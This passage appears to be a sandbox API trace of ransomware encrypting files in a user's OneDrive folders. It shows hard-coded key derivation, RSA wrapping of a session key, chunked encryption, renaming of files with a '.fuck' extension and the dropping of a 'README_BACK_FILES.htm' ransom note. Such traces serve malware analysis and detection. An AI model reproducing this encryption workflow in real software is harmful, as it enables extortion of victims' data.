lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.289] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0xd0, lpOverlapped=0x0) returned 1 [0273.289] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0xd0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0xe0) returned 1 [0273.289] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0xe0, lpOverlapped=0x0) returned 1 [0273.289] CloseHandle (hObject=0x5d48) returned 1 [0273.289] CloseHandle (hObject=0x5d4c) returned 1 [0273.290] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-bd\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-bd\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-bd\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-bd\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0273.297] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-bd\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0273.297] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-bd\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-bd\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0273.300] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-bd\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-bd\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-bd\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-bd\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0273.302] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0273.302] CryptDestroyKey (hKey=0x2fb108) returned 1 [0273.302] CryptReleaseContext (hProv=0x2f28e48, dwFlags=0x0) returned 1 [0273.302] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0273.302] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0273.302] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-bd\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-bd\\readme_back_files.htm")) returned 0xffffffff [0273.302] AreFileApisANSI () returned 1 [0273.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0273.302] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-bd\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-bd\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0273.303] GetFileType (hFile=0x5d3c) returned 0x1 [0273.303] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0273.305] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0273.305] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-in\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0273.305] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.305] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.305] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0273.305] GetLastError () returned 0x0 [0273.305] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-in\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-in\\filesync.localizedresources.dll.mui")) returned 0x20 [0273.306] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-in\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0273.307] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-in\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-in\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0273.308] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-in\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bn-in\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0273.309] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bn-in\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0273.309] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f28c28) returned 1 [0273.311] CryptCreateHash (in: hProv=0x2f28c28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0273.311] lstrlenA (lpString="VjnQjmgTDrnneBnnDhUveiykzMlQm") returned 29 [0273.311] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0273.312] CryptDeriveKey (in: hProv=0x2f28c28, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fae08) returned 1 [0273.312] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0273.312] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0273.312] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f28dc0) returned 1 [0273.312] CryptImportPublicKeyInfo (in: hCryptProv=0x2f28dc0, dwCertEncodingType=0x1, pInfo=0x2f343e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f34410*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f34418*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2faf48) returned 1 [0273.312] CryptEncrypt (in: hKey=0x2faf48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0273.312] CryptEncrypt (in: hKey=0x2faf48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f28ba0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f28ba0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0273.312] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f28ba0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f28ba0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0273.313] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.326] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.326] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.348] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.348] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.348] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.348] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.349] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.349] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.349] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.349] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.349] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.349] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.349] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.349] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.349] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.349] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.349] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.349] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.349] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.349] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.350] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.350] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.350] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.350] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.350] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.350] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.350] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.350] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.350] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.350] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.350] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.350] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.351] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.351] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.351] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.351] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.351] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.351] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.351] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.351] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.351] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.351] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.351] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.352] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.352] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.352] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.352] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.352] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.352] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.352] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.352] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.352] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.352] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.352] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.352] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.353] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.353] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.353] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.353] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.353] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.353] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.353] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 